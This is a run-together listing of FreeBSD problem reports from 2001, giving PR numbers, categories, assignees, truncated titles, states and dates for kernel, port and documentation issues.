kern/26547 "lnc" problem with shared memory mode wit o [2001/04/13] i386/26562 /dev/lpt0 returns EBUSY when attempting t o [2001/04/14] kern/26563 ioctl(SNDCTL_DSP_SPEED) returns -1 when f o [2001/04/14] kern/26584 kernel boot messages aren't logged correc o [2001/04/15] bin/26602 RELENG_4 ssh/sshd modifies the 'erase' ch f [2001/04/16] kern/26608 when boot Freebsd 4.2 Release from the c o [2001/04/16] kern/26618 unmount(2) can't unmount a filesystem who o [2001/04/17] misc/26636 If /etc/ttys goes empty, init(8) never re a [2001/04/17] misc/26646 srand() provides only 8-bit table o [2001/04/17] misc/26649 diskless client can't share root with ser o [2001/04/17] misc/26658 update to src/usr.bin/calendar/calendars/ o [2001/04/18] misc/26678 Correction of: misc/26521 o [2001/04/18] bin/26686 Freeze at boot from 4.3-RC4 floopies - US o [2001/04/18] misc/26695 CHANGE REQUEST: kill(all) -l output o [2001/04/19] misc/26720 Both .cshrc and .profile should have the o [2001/04/20] kern/26740 rwatson [PATCH] jail improvement f [2001/04/22] misc/26763 darrenr installing ipfilter sample files to share o [2001/04/22] kern/26787 dd sysctl change request o [2001/04/23] kern/26798 cvsup 4.3-RC -> 4.3-STABLE causes problem o [2001/04/23] ports/26801 ports cyrus port should add periodic file to pr s [2001/04/23] bin/26803 des Fix fetch to allow FTP puts in '-o' & all o [2001/04/24] i386/26812 peter old bootstrap /sys/i386/boot/... still in a [2001/04/25] bin/26854 sound Better fix for ESS Technology Maestro-2E o [2001/04/26] misc/26879 mkfilter not installed, yet referred to v s [2001/04/26] ports/26882 kde KDE should use ca-roots port for SSL cert o [2001/04/26] ports/26884 ports new port for visualworks 5i.3 o [2001/04/27] ports/26904 jim New port(?): net/everybuddy-i18n (i18n pa o [2001/04/28] bin/26919 qa sysinstall' fdisk can ONLY set bootable f o [2001/04/29] docs/26943 doc [patch] description of :C modifier is mis o [2001/04/30] i386/26994 obrien AMD Athlon Thunderbird not known to ident o [2001/05/01] kern/27008 kernel function sysbeep(xxx, 0) does prod o [2001/05/01] ports/27019 marcel patch supplied in PR ports/26976 breaks l o [2001/05/02] misc/27039 new syscons screensaver a [2001/05/02] docs/27040 dougb rc(8) and syscons(4) talk about rc.conf.l f [2001/05/02] misc/27041 modify src/release/Makefile to make anoth f [2001/05/03] bin/27063 darrenr /sbin/ipfs missing o [2001/05/04] ports/27075 sobomax Port java/javavmwrapper installs no man p o [2001/05/04] ports/27079 sobomax Improvements for javavmwrapper? o [2001/05/06] bin/27163 cracauer sh trap TSTP () deadly hangs o [2001/05/06] ports/27167 ports ETHOberonV4 won't run a [2001/05/07] ports/27182 mharo Teach portlint to recognize RUN_DEPENDS=$ o [2001/05/07] ports/27187 jmz add linux ioctl handler to dri xf86-403 c o [2001/05/07] bin/27188 fix of rsh non-interactive mode behaviour o [2001/05/07] misc/27190 Day light savings in Mexico. o [2001/05/08] ports/27200 greid new port: bed (binary editor) o [2001/05/08] i386/27216 qa Can not get to shell prompt from serial c o [2001/05/09] kern/27232 On NFSv3 mounted filesystems, stat return o [2001/05/10] bin/27258 getty didn't check if if= isn't empty o [2001/05/11] bin/27268 fdisk does not recognize Linux extended p o [2001/05/11] kern/27269 Cannot mount linux extended (logical) par o [2001/05/11] bin/27270 cg sys/soundcard.h fails to define AFMT_S16_ o [2001/05/12] bin/27281 vidcontrol(1) does not have error codes f [2001/05/12] bin/27283 brian netstat -i missing IPv4 input packet coun o [2001/05/12] bin/27289 green SSH don't do correct diagnostic when no r o [2001/05/12] ports/27291 jim Bluefish port doesn't build mo files o [2001/05/12] bin/27294 ports pkg_update disregards suffixes (portrevis o [2001/05/13] i386/27306 mp hw watchpoints work unreliable under gdb o [2001/05/14] bin/27319 obrien df displays amd pid processes o [2001/05/17] kern/27403 lpt driver doesn't handle flags anymore o [2001/05/17] bin/27423 change request o [2001/05/18] kern/27429 'dependant' is a misspelling o [2001/05/18] bin/27433 ps binary does not do what the man page s o [2001/05/20] misc/27471 Linux emulation is missing code needed to o [2001/05/20] ports/27473 jmz when I install the package XFree86-4.0.3_ f [2001/05/22] ports/27542 sobomax xmps should not require gnome o [2001/05/23] kern/27571 bp Changing policy of shadowing files and di o [2001/05/23] bin/27604 change truncate to support low case size o [2001/05/24] i386/27627 machdep.tsc_freq does not exists on machi o [2001/05/25] misc/27633 Mapping for serbian keyboards, follows IS o [2001/05/25] docs/27653 doc Updates to send-pr.html to support MIME o [2001/05/26] docs/27654 doc Update to PR 27653 o [2001/05/26] kern/27660 Kernel does not return error if adding du o [2001/05/26] misc/27677 miss BIND name server library o [2001/05/27] bin/27687 fsck wrapper is not properly passing opti o [2001/05/27] bin/27697 assar trouble compiling libroken o [2001/05/31] gnu/27803 Enhancement to sort(1) o [2001/06/01] misc/27816 rpcgen -b generates server code which doe o [2001/06/01] misc/27829 kris pax's uid/gid cache is read-only a [2001/06/02] docs/27833 cjc No man page for locate.rc o [2001/06/02] kern/27834 Cannot warm-reboot Compaq AP400 due to SC o [2001/06/02] kern/27835 execve() doesn't conform to execve(2) spe o [2001/06/02] ports/27838 keichii dot.emacs is 600 s [2001/06/02] docs/27843 alex [PATCH] make.conf WITH_* variables aren't o [2001/06/02] kern/27849 dfr AGP RELEASE ioctl frees memory o [2001/06/04] misc/27872 "Load Config" (sysinstall) hangs Compaq D o [2001/06/06] ports/27903 peter Update: www/transproxy o [2001/06/06] docs/27915 doc man 5 passwd does not properly explain th o [2001/06/06] docs/27919 n_hibma missing usb man pages o [2001/06/06] docs/27921 markm manpage skey(1) should be skey(7) o [2001/06/07] alpha/27930 NE2000 not supported on FreeBSD Alpha 4.x o [2001/06/07] ports/27931 ports devel/pth vs. native pthreads conflict fi o [2001/06/07] alpha/27933 alpha Time jitter under load on FreeBSD 4.3 alp a [2001/06/07] ports/27936 mi Update /usr/ports/deskutils/xmdiary 3.0.1 a [2001/06/08] conf/27959 imp Add cygwin termcap entry o [2001/06/08] bin/27972 losing information with talk o [2001/06/10] i386/28023 sendmail tries to get the netgraph.ko mod a [2001/06/11] conf/28078 qa /stand/sysinstall skips distro selection a [2001/06/11] conf/28081 murray /stand/sysinstall errs out if /cdrom/ alr o [2001/06/13] ports/28121 sobomax New port: 3D modelling and animation syst o [2001/06/13] ports/28138 tg python os.statvfs module is not functiona a [2001/06/15] bin/28171 des [PATCH] to support a HTTP_REFERER env var a [2001/06/15] gnu/28189 [PATCH] fix for detecting empty CVS commi o [2001/06/16] kern/28206 bp UMAPFS module should depend on NULLFS - p o [2001/06/17] misc/28236 [PATCH] iso-8859-1_to_cp437.scm doesn't c o [2001/06/17] kern/28247 pirzyk ATM/HARP driver for IDT and ForeLE ATM ca o [2001/06/18] misc/28255 picobsd documentation still references ol s [2001/06/18] kern/28260 UIO_MAXIOV needs to be made public o [2001/06/20] bin/28294 dump of vinum based file systems by devic o [2001/06/20] kern/28297 change request for sys/i386/conf/NOTES o [2001/06/21] ports/28332 dwcjr Gimp manual port 1-2 years out of date, m o [2001/06/21] bin/28333 rtprio/idprio setuid problems s [2001/06/22] i386/28346 n_hibma USB ethernet dongle detach requires "ifco o [2001/06/23] bin/28364 lex(1) generated files fail to compile cl o [2001/06/23] ports/28365 wosch Typical use of portchecheckout breaks int o [2001/06/23] docs/28371 phk malloc(2) man page correction o [2001/06/26] ports/28432 obrien [patch] comms/conserver fails with MD5 pa o [2001/06/26] bin/28435 [patch] allow newsyslog to signal process o [2001/06/27] bin/28449 cracauer sh(1) aborts on certain input a [2001/06/27] misc/28455 GNU readline should be updated to 4.2 o [2001/06/27] misc/28456 german keymap with dead keys o [2001/06/27] ports/28471 keith no iso8859 font o [2001/06/28] misc/28494 n_hibma ugen usable only from "attach" or by usbd o [2001/06/29] misc/28529 runetype.h doesn't have C++ 'extern "C"' o [2001/06/30] docs/28555 doc [PATCH] style(9) isn't explicit about boo o [2001/06/30] kern/28566 bp Mount_null loopbacks can hang startx temp o [2001/07/01] bin/28620 ru xinstall has no way to pass options to st o [2001/07/02] ports/28644 jmz Make error when rebuilding xdvi o [2001/07/03] ports/28678 wosch portcheckout doesn't allow flexible build o [2001/07/03] ports/28680 paul pkg_update complains about missing REQUIR o [2001/07/03] kern/28681 ATAPI MO drive support o [2001/07/03] ports/28682 portmgr Some port install builds fail if silent ( o [2001/07/04] docs/28699 doc strptime(3) %d format specifier not compl o [2001/07/05] ports/28717 billf net/net-snmp stop enumerate interfaces wh a [2001/07/05] ports/28758 roam New port: security/apg o [2001/07/06] ports/28771 ports opendx server fails to start o [2001/07/07] bin/28789 /usr/bin/last does not filter for uucp co o [2001/07/07] ports/28803 obrien ports/comms/conserver does not support ## o [2001/07/08] ports/28810 lioux qpopper 4.0.3 + PAM modification; HAVE_SH o [2001/07/08] bin/28820 tar and cpio cannot deal with files > 2GB o [2001/07/10] ports/28887 brian [PATCH] sandbox for httptunnel! o [2001/07/10] kern/28888 Acer 8000 NIC not detected correctly o [2001/07/11] misc/28890 merge.c compares int i against size_t siz o [2001/07/13] misc/28938 small PicoBSD - An update to the build script t a [2001/07/13] docs/28949 phk the mknod(8) man page stills refers to bl o [2001/07/14] bin/28972 dwmalone gamma returns same result as lgamma o [2001/07/14] i386/28975 mjacob RocketPort problems o [2001/07/14] misc/28980 Fujitsu/Siemens Lifebook E-6540 stalls wh o [2001/07/15] bin/28988 We need more simple message digesting too f [2001/07/15] docs/28994 dd New article for docproj "Checkpoint VPN-1 o [2001/07/16] ports/29009 dburr fsgs port installs cfg file with wrong pa o [2001/07/18] bin/29062 markm krb4 and krb5 multiply defined version sy o [2001/07/18] bin/29071 relay patch for rwhod o [2001/07/19] misc/29077 At loading notebook pccardd not correctly o [2001/07/19] docs/29088 phk jail(8) man page has innacurate instructi o [2001/07/19] misc/29089 Some kind of fsbn0 error... o [2001/07/20] misc/29103 make (1) dump core while processing ^C fr o [2001/07/21] bin/29119 menu of fdisk editor in 4.3R does not lis o [2001/07/22] docs/29143 doc List of man pages that need to be written o [2001/07/22] ports/29154 nik TeX resource settings from MAKE_ENV in pr o [2001/07/23] ports/29163 jmz XFree86-4 port should register XFree86-4- o [2001/07/23] bin/29164 maxim [PATCH] lack of 'Do not fragment' flag in f [2001/07/23] docs/29166 tomsoft Flaw in growfs(8) manpage o [2001/07/23] conf/29167 rc.pccard doesn't check /var/run/pccardd. o [2001/07/23] kern/29169 mjacob FC loop that 'goes away' never times out o [2001/07/23] bin/29175 tmm [PATCH] rpcgen(1) and inetdflag/pmflag su o [2001/07/23] bin/29177 [PATCH] rpc client create functions with o [2001/07/24] ports/29199 sobomax jdk12beta port should register open-motif o [2001/07/25] ports/29223 portmgr cyrus-imapd and postfix master.8 manpage o [2001/07/25] kern/29233 VIA 82C686 AC97 codec gets probed as 'chi o [2001/07/26] docs/29245 doc top(1) manpage doesn't understand SMP o [2001/07/26] ports/29248 jmz XFree86 4.1 hangs with an i815 chip while o [2001/07/27] kern/29264 Recovery from LIPs on FCAL using isp not a [2001/07/28] misc/29292 sos The functional addtion to burncd(8) o [2001/07/29] ports/29297 ports NEW PORT: System Maintenance Aid written o [2001/07/29] ports/29298 cpiazza Installation of documentation for vcdgear o [2001/07/29] alpha/29299 alpha FreeBSD 4.3 Alpha + Tekram SCSI adapter p o [2001/07/29] kern/29307 NIC Initialization fails on dual CPU syst o [2001/07/29] misc/29312 sound Using mixer on pcm misbehaves with onboar f [2001/07/29] kern/29318 mjacob Exabyte 8200 needs SA_QUIRK_1FM and SA_QU o [2001/07/30] gnu/29331 still documented broken options in gcc ma o [2001/07/30] ports/29343 ports new postgresql7 port feature o [2001/07/31] kern/29355 adrian [patch] lchflags support o [2001/08/01] bin/29361 startslip can't load if_sl.ko o [2001/08/01] bin/29363 [PATCH] newsyslog can support time as ext o [2001/08/02] ports/29392 portmgr Small built-time glitch in Makefile for a o [2001/08/02] kern/29395 reaction on ctrl-alt-del - poweroff, halt o [2001/08/03] kern/29423 [PATCH] kernel security hooks implementat o [2001/08/07] kern/29499 dwmalone it is not possible to send creditionals o [2001/08/07] bin/29516 markm telnet from an non FreeBSD host still use o [2001/08/07] ports/29519 ports X11 ports generate undef pthread refs wit o [2001/08/07] ports/29528 dburr Update misc/tvguide to 0.9.0 o [2001/08/07] misc/29529 dcs Boot prompt "?" command doesn't list "boo f [2001/08/08] kern/29538 joerg Mounting /dev/fd0 never completes o [2001/08/08] misc/29550 duplicate pings jinside of vmware 2.0 f [2001/08/09] docs/29571 doc [PATCH] No man page for pgrp kernel funct o [2001/08/09] bin/29581 proposed gethostbyXXXX_r() implementation f [2001/08/09] ports/29590 ports [new port] www/parser-bin One more server o [2001/08/11] kern/29621 n_hibma Missing man page for ulpt o [2001/08/11] ports/29638 green [patch] upgrade security/cfs a [2001/08/12] i386/29639 murray entry for zip 250 drives in /etc/disktab o [2001/08/13] bin/29675 lint fails on stdio.h f [2001/08/13] ports/29691 portmgr New port variable USE_COMPAT_LIB - bsd.po o [2001/08/14] kern/29698 linux ipcs doesn'work o [2001/08/15] kern/29727 amr_enquiry3 structure in amrreg.h (amr d o [2001/08/15] ports/29732 sobomax linking error f [2001/08/16] kern/29777 n_hibma kernel uscanner.c contains wrong vendor a f [2001/08/17] docs/29807 dd [PATCH] XFREE86_VERSION is undocumented f [2001/08/18] bin/29850 markm ftpd.c doesn't check via PAM/pam_acct_mgm f [2001/08/18] ports/29856 portmgr make extract of cyrus did an install of c o [2001/08/19] conf/29870 rc.diskless2 uses /usr/sbin/mtree before o [2001/08/19] kern/29875 CURRENT driver for Tekram DC395X and DC31 o [2001/08/19] ports/29883 markm Update textproc/par to 1.53 o [2001/08/20] misc/29893 qa suggestions for 4.4 sysinstall o [2001/08/20] bin/29897 markm pam_unix patch, which uses loginclass pas a [2001/08/20] docs/29902 www Mozilla package URL problems o [2001/08/20] kern/29915 kernel panics on interaction with mlock a o [2001/08/21] ports/29929 ports wginstall.pl script chokes on calculated o [2001/08/22] bin/29961 ru A4 paper size for groff knob for /etc/mak o [2001/08/22] kern/29962 sent broadcast packets get spurious 4 byt a [2001/08/23] docs/30008 doc This document should be translated, comme o [2001/08/23] ports/30012 dirk mod_php4 does not build on 4.4 with apach o [2001/08/24] kern/30052 dc(4) driver queues outgoing pkts indefin o [2001/08/25] docs/30082 jkoshy Dead URL on website o [2001/08/27] ports/30148 portmgr devel/libtool: shared libs with compaq-cc o [2001/08/28] kern/30160 Kernel panic when flash disk is removed a f [2001/08/28] ports/30166 ports ports/net/nettest2001 o [2001/08/28] kern/30179 FreeBSD 5.0 install hangs: deviceTry: mak o [2001/08/29] misc/30186 getaddrinfo does not handle incorrect ser o [2001/08/29] kern/30200 yokota Bug in psm in 4.4-RC o [2001/08/29] ports/30201 msmith editors/wordperfect in ports is not usabl o [2001/08/29] i386/30206 PS/2 server 85 can't boot kern.flp o [2001/08/29] misc/30213 Fatal Errors of Server Programe o [2001/08/30] misc/30224 No irq - PCI wi card doesn't allow interu o [2001/08/30] ports/30225 nectar mozilla 0.93 build problem o [2001/09/01] bin/30247 sh cannot redirect to /dev/fd/1 or from / o [2001/09/01] docs/30253 bp [PATCH] mount_unionfs(8) and mount_nullfs o [2001/09/01] kern/30257 apm enabled kernel panics (4.4-RC) o [2001/09/02] ports/30264 greid Update port: graphics/xawtv o [2001/09/02] ports/30272 grog [PATCH] instant-workstation RUN_DEPENDS b o [2001/09/03] ports/30298 chuckr [PATCH] a2ps-4.13 can't cope with ENOMEM o [2001/09/03] conf/30301 Default printcap "mx" config too small o [2001/09/04] misc/30320 n_hibma USB mouse does not work after return'ing o [2001/09/04] bin/30321 strftime(3) '%s' format does not work pro o [2001/09/05] bin/30334 mount_nfs ignores acregmin, acregmax, axd o [2001/09/05] conf/30341 be keymap: wrong Capslock behaviour with o [2001/09/05] bin/30360 vmstat returns impossible data o [2001/09/06] bin/30392 sh: incorrect value of $? in here-documen o [2001/09/07] misc/30412 rtdl/dlopen() fails to merge common varia o [2001/09/07] kern/30422 WDT hardware watchdog driver & daemon o [2001/09/07] bin/30424 Generalization of vipw to lock pwdb while o [2001/09/08] conf/30441 Can't set interface arguments for dhcp co o [2001/09/08] docs/30442 doc remove broken referemce to gettime(9) fro o [2001/09/08] docs/30443 keramida remove broken reference to kerberos(1) fr o [2001/09/08] docs/30444 keramida remove broken references to gated(8) and o [2001/09/09] i386/30461 sound no audio cd with cmi8330 o [2001/09/09] bin/30464 jasone pthread mutex attributes -- pshared f [2001/09/09] bin/30471 brian periodic script output to a file always a o [2001/09/10] bin/30484 rpc.rstatd consumed lots of open file des o [2001/09/10] bin/30496 `host` does not work properly with top-le o [2001/09/10] ports/30499 portmgr libtool-1.4.1 port diffs o [2001/09/11] i386/30503 imp stray pccard card insertion events after o [2001/09/11] kern/30510 no apm for VIA KT133A chipset o [2001/09/11] ports/30511 kde Problem getting opengl/mesa to work with o [2001/09/11] misc/30517 using sysinstall with install.cfg has no o [2001/09/12] misc/30526 inserting a Sony Ninja-ATA pcmcia style c o [2001/09/12] misc/30536 sos burncd(8) doesn't wait long enough for CD o [2001/09/12] kern/30541 imp [PATCH] old pccard beep depends on value o [2001/09/12] bin/30542 [PATCH] add -q option to shut up killall s [2001/09/12] bin/30543 ru [PATCH] use err() instead of just exit() o [2001/09/12] bin/30546 [PATCH] /etc/rc pedantry o [2001/09/13] docs/30556 doc vnconfig man page incorrect; functionalit o [2001/09/13] ports/30557 ports bitchx fails to build when WITH_TCL=yes i o [2001/09/13] kern/30570 boot loader don't reacts on USB keyboard o [2001/09/14] ports/30573 nakai /usr/X11R6/bin/xfce_setup does not create o [2001/09/16] kern/30608 kern.ps_showallproc=0 doesn't limit queri o [2001/09/16] docs/30618 keramida ediff man page incomplete o [2001/09/16] ports/30623 sobomax Update of the audio/glame port o [2001/09/17] ports/30625 ports [PATCH] vmware2 patch for -current with K o [2001/09/17] kern/30634 kevent.data value incorrect for UDP socke o [2001/09/17] bin/30639 apmd crashes on SIGHUP (under certain con o [2001/09/17] bin/30640 apmd does not terminate properly on SIGTE o [2001/09/18] bin/30661 FreeBSD-current fails to do partial NFS f o [2001/09/20] misc/30683 [PATCH] loader(8) fails to load module wh a [2001/09/20] bin/30685 cjc Patch for usr.bin/hexdump o [2001/09/20] ports/30698 ports New port: news/pl-slrn o [2001/09/20] i386/30700 sound Applications cannot synchronize sound usi o [2001/09/20] ports/30701 ports setiathome port misuses the 'nobody' user o [2001/09/21] ports/30707 ports midnight commander can't handle correctly o [2001/09/22] ports/30732 obrien bash2 - pkg-plist fix and sample files ad a [2001/09/22] bin/30737 murray sysinstall leaks file descriptors on rest o [2001/09/23] ports/30754 nakai x11/dgs port overwrites a number of files o [2001/09/23] ports/30777 portmgr add a 'make pkg-plist' make target in por o [2001/09/23] misc/30778 termcap problem with wyse-60 terminal o [2001/09/24] ports/30788 sobomax compile works, install fails of graphics/ o [2001/09/24] kern/30794 sound ESS Solo-1 does not work after suspend/re o [2001/09/24] i386/30808 sound t4dwave on Acer Alladin M5451 interrupt p o [2001/09/24] docs/30809 doc fdisk(8) cleanup o [2001/09/25] bin/30812 giant termcap database update o [2001/09/25] ports/30813 jmz Xfree86-4 port creates libfreetype.so.6 w o [2001/09/25] bin/30819 /bin/mv results in warnings when /bin/cp o [2001/09/25] kern/30836 wpaul Chipset SiS735 / NIC SiS 900 o [2001/09/26] ports/30848 roam courier imapd won't compile with vpopmail o [2001/09/26] bin/30854 bootpd/bootpgw change - skip ARP modifica o [2001/09/26] misc/30857 intr_machdep.c allows access out of array f [2001/09/26] i386/30860 While install after "Mounting root from u o [2001/09/27] bin/30863 bootpd/dovend.c Win95 compatibility impro o [2001/09/27] ports/30870 ports httpd in free(): warning: recursive call o [2001/09/27] docs/30873 doc ``ip'' man page does not specify byte ord o [2001/09/28] bin/30887 dump allways saves files with modified c- o [2001/09/29] bin/30907 green [PATCH] ssh configuration oddities o [2001/09/29] ports/30923 obrien small fix for devel/gindent port o [2001/09/30] ports/30929 brian [net/pppoa] use usbd to initialize USB AD o [2001/09/30] ports/30936 taoka pips-sc880 installed script contains inco o [2001/09/30] conf/30938 Improving behavior of /etc/periodic/daily o [2001/09/30] kern/30951 Optimize page queue scan on miss of speci o [2001/10/01] alpha/30970 alpha Ensoniq 1371 (Creative chipset) does not o [2001/10/01] bin/30972 peter nfsd and mountd are in the wrong location o [2001/10/01] ports/30979 ports New port for "txfonts" TeX's font package o [2001/10/02] ports/30983 portmgr [PATCH] Some staroffice cdrom fixes o [2001/10/03] ports/31013 obrien John The Ripper Package Lists Bad Path o [2001/10/04] bin/31034 regularly add original address logging fo o [2001/10/04] kern/31043 Missing Ptrace functionality in Linuxulat o [2001/10/04] kern/31048 linprocfs:/proc/meminfo cannot handle mul o [2001/10/04] bin/31052 fenner Traceroute needs update o [2001/10/05] ports/31061 portmgr New port: security/gnupg-devel o [2001/10/06] bin/31088 tobez Make whereis.pl use strict, and a couple o [2001/10/07] misc/31097 main thread will accept() failure when so o [2001/10/07] ports/31101 roam Update port: mail/vpopmail various requir o [2001/10/07] docs/31109 doc replace gif images w/ png ones due to pat o [2001/10/08] bin/31135 /bin/df reporting 'NaNB' as a Size. o [2001/10/08] ports/31142 portmgr patch-libtool target in bsd.port.mk break f [2001/10/09] ports/31159 cpiazza gmixer 0.98c dumps core with some mixers o [2001/10/09] docs/31164 doc man page for strftime is incorrect o [2001/10/10] bin/31199 tunefs error is incorrect when enabling s o [2001/10/10] conf/31200 Modification of rc.diskless1 needs change o [2001/10/10] bin/31201 [patch] add free_space(chunk) to libdisk o [2001/10/10] bin/31205 mux [PATCH] WARNSify and add a new option to o [2001/10/10] docs/31210 peter cvs info page missing -R a [2001/10/11] misc/31218 matusita How to build release from selected date a [2001/10/11] conf/31219 Missing cons25u entry in termcap o [2001/10/11] ports/31222 ports ports:astro/SETIsupport(version is wrong) o [2001/10/11] ports/31229 ports new port: astro/linux-setiathome-i686 o [2001/10/13] kern/31255 select with zero timeout returns 0 even w o [2001/10/14] docs/31264 jdp cvsup(1) "base" option and keyword descri a [2001/10/14] docs/31271 doc rl(4) discourages vender openness by disp o [2001/10/15] ports/31282 ports NEW PORT: aolserver+ad o [2001/10/15] misc/31297 yokota New screen blanker module for syscons o [2001/10/18] i386/31353 'shutdown -p' does not work on SMP Tyan T o [2001/10/19] kern/31367 General boot fault during mounting root w o [2001/10/19] ports/31369 adrian New KMerlin Port o [2001/10/19] docs/31370 fenner typo in tcpdump manpage o [2001/10/19] misc/31380 NFS rootfs mount failure message too cryp o [2001/10/20] bin/31387 When getuid()=0, mailwrapper should drop o [2001/10/20] ports/31389 portmgr tidy readme templates + port readme enhan o [2001/10/21] i386/31427 minor incorrect code in sys/i386/i386/pma o [2001/10/22] bin/31432 umount(8) and unmount(2) don't corespond o [2001/10/22] kern/31445 sound cat sound.au > /dev/audio fails for sound a [2001/10/23] kern/31455 n_hibma [PATCH] ohci driver probrem when send dat o [2001/10/23] kern/31456 Register number definition for AMD PCnet o [2001/10/23] ports/31462 peter rdist6 does not like accounts with '.' in o [2001/10/25] ports/31486 kuriyama ports/palm/prc-tools-gcc does not build m f [2001/10/25] ports/31487 dinoex licq-qt-gui plugin does not parse local a o [2001/10/25] kern/31490 Panic in sysctl_sysctl_next_ls on empy no o [2001/10/26] ports/31517 ports New Port: kdetheme-qnix o [2001/10/26] kern/31521 cg pcm0 plays too fast on Intel 82801BA (ICH o [2001/10/27] i386/31535 Can't reboot system: Tyan Thunder K7+ Dua o [2001/10/28] conf/31555 rc.syscons does not run standalone f [2001/10/28] ports/31579 kde kdessl of kde-2.2.1 wants to link to libs o [2001/10/29] bin/31588 change request to allow mount(1) to set t a [2001/10/29] ports/31591 kde kdeinit crashes when I close KDE2 session o [2001/10/29] kern/31624 writev may return undocumented ECONNRESET o [2001/10/30] ports/31630 jmz Port se-ispell install the dictionary in o [2001/10/30] bin/31632 ip6fw error under DNS dislabled environme o [2001/10/30] docs/31640 doc Avoiding uppercase program names in manpa o [2001/10/30] ports/31644 jmacd Update: devel/prcs o [2001/10/30] kern/31647 socket calls can return undocumented EINV o [2001/10/30] docs/31653 doc Chapter 14 of the Handbook lacks content o [2001/10/31] ports/31669 ports New port: graphics/xawtv_applet o [2001/10/31] ports/31674 ports port math/plplot doesn't build a TCL enab o [2001/10/31] ports/31684 ports ports/comms/hylafax fixes o [2001/11/01] i386/31686 Problem with the timestamp option when fl o [2001/11/02] kern/31708 VM system / fsync / flushing delayed inde o [2001/11/02] kern/31711 Enhancements and bug fixes to Aironet dri o [2001/11/02] ports/31712 ports Add the Linux to flash Cisco/Aironet card o [2001/11/02] i386/31716 FreeBSD uses broken tsc timecounter by de o [2001/11/03] ports/31744 ports New port: emulators/minix (2.0.0) o [2001/11/05] gnu/31772 New option in dialog(1) o [2001/11/05] ports/31773 ports New port: audio/cplay, audioplayer for th s [2001/11/06] ports/31809 kde [UPDATE] qt23 port to qt-2.3.2 f [2001/11/08] ports/31858 ports New port: pike 7.2.234 (current CVS versi o [2001/11/08] ports/31862 portmgr [PATCH] 'make search' problem if /usr/obj o [2001/11/09] misc/31890 new syscons font o [2001/11/10] bin/31906 No method available to unwind atexit(3) s o [2001/11/11] ports/31910 greid comms/sms_client o [2001/11/12] ports/31926 ports New port security/drweb-qmail: Qmail mess o [2001/11/12] bin/31933 dillon pw can interpret numeric name as userid d a [2001/11/12] ports/31943 dirk mysql323-server port hostname look up fai o [2001/11/12] ports/31944 portmgr bsd.port.mk: USE_XPM (implied by USE_MOTI o [2001/11/13] kern/31971 microuptime() went backwards when apm is o [2001/11/14] misc/31981 (mis)feature in getnetent parsing -- comm o [2001/11/14] bin/31985 New /etc/remote flag for tip to append LF o [2001/11/14] bin/31987 patch to allow dump(1) to notify operator s [2001/11/15] i386/32014 ppi locks up system during boot o [2001/11/15] ports/32015 kuriyama ports/palm/pilrc bugs o [2001/11/15] docs/32020 doc loader.8 manpage missing tunables o [2001/11/15] ports/32034 ports [NEW PORT] ncurses-ada -- an Ada 95 bindi o [2001/11/16] ports/32037 ports New port: pm-lib o [2001/11/16] ports/32039 greid UPDATE devel/asmutils 0.14 -> 0.15 a [2001/11/16] docs/32041 doc Add point about net.inet.tcp.portange.{fi o [2001/11/16] ports/32046 ports Port cleanup: x11-fonts/webfonts o [2001/11/16] docs/32054 doc inconsistency between index.3 and rindex. o [2001/11/17] conf/32067 Problems with spanish keyboard in console o [2001/11/18] ports/32076 ports WISH: merge icon patch to blackbox port o [2001/11/18] bin/32092 crypt pickups the wrong password format o [2001/11/19] conf/32108 Proposed Firewall (IPv4) configuration sc o [2001/11/19] ports/32114 portmgr WRKDIRs should be moved to a central loca a [2001/11/19] misc/32120 PR misc/24324 errata o [2001/11/19] ports/32122 jmz xf86cfg graphics-mode fails on Samsung Sy o [2001/11/20] bin/32126 getopt(3) not Unix-98 conformant f [2001/11/20] misc/32144 murray unattended install with sysinstall doesn' o [2001/11/20] ports/32145 jmz XFree86 doesn't ldconfig itself o [2001/11/20] ports/32147 kris mindguard port dumps core o [2001/11/21] kern/32169 kernel option to enable PCI devices on ma o [2001/11/21] ports/32174 portmgr Autoconf patch for bsd.port.mk a [2001/11/22] misc/32193 phantom Termcap ACS support for greek ISO-8859-7 o [2001/11/22] ports/32202 ports ports/devel/py-htmlkit distribution does o [2001/11/22] ports/32207 ade libiconv cannot be built by a pleb o [2001/11/23] misc/32210 System hangs while kernel waiting for SCS o [2001/11/23] ports/32232 dirk Update and bugfix port: www/mod_php4 o [2001/11/23] ports/32243 sobomax ports/py-wxPython fails to compile o [2001/11/24] i386/32251 bugfix and new feature for apmd o [2001/11/24] ports/32258 scrappy converters/p5-Convert-ASN1 out of date o [2001/11/24] ports/32259 scrappy Update security/p5-IO-Socket-SSL request o [2001/11/25] misc/32265 dwmalone Adding calendar.french f [2001/11/25] ports/32272 petef port upgrade to latest blender version o [2001/11/25] ports/32273 kde kdm doesn't set paths from login.conf f [2001/11/25] ports/32282 petef fvwm 2.4.3 generate error wrt 'Help' key o [2001/11/26] conf/32288 After install: /etc/rc complains if crypt o [2001/11/26] bin/32299 peter nm coredumps on sendmail in -current o [2001/11/26] i386/32301 dfr Fix for agpgart for the AMD-751 and relat o [2001/11/26] ports/32317 petef Request for linux-qt port o [2001/11/26] bin/32318 cjc no userland tool available to test resolv o [2001/11/28] ports/32361 ports port doesn't work, www/mod_log_mysql o [2001/11/28] ports/32362 ports postgresql7 port should install more *.h a [2001/11/29] conf/32375 murray sysinstall doesn't respect User generated f [2001/11/29] ports/32391 shige psgml-emacs20 breaks emacs's standard htm o [2001/11/30] misc/32400 rwhod - option to specify hostname o [2001/11/30] ports/32405 dirk Japanese encoding translation support for a [2001/11/30] bin/32411 shutdown's absolute-time handling could b o [2001/12/01] docs/32425 doc Document cvs update `P file' output o [2001/12/01] bin/32433 Cannot specify files beginning with + on o [2001/12/02] ports/32444 dirk www/mod_php4: ctype support o [2001/12/03] docs/32468 doc broken link in handbook: sysutils/mkisofs o [2001/12/03] kern/32478 scsi/NIC drivers fail when using SMP kern o [2001/12/03] misc/32480 Missing graphic characters in syscons fon o [2001/12/04] bin/32501 quot(8) is stupid regarding the filesyste o [2001/12/04] ports/32502 dima port update palm/pilot-link to 0.9.6 o [2001/12/04] ports/32508 ports www/flashplugin-mozilla has malloc bug o [2001/12/04] ports/32517 green Update port: emulators/snes9x to 1.39 o [2001/12/05] ports/32546 znerd Remove fully-qualified lib symlinks from o [2001/12/07] ports/32572 kde net/kio_fish: konq has no icons for fish: s [2001/12/07] docs/32578 doc A _really_ petty change to the front page o [2001/12/07] ports/32582 greid Update port: audio/tempest_for_eliza o [2001/12/07] bin/32588 grog operator should backup vinum vols o [2001/12/07] ports/32596 keichii update port: chinese/auto-tw-l10n o [2001/12/08] ports/32604 portmgr Many ports 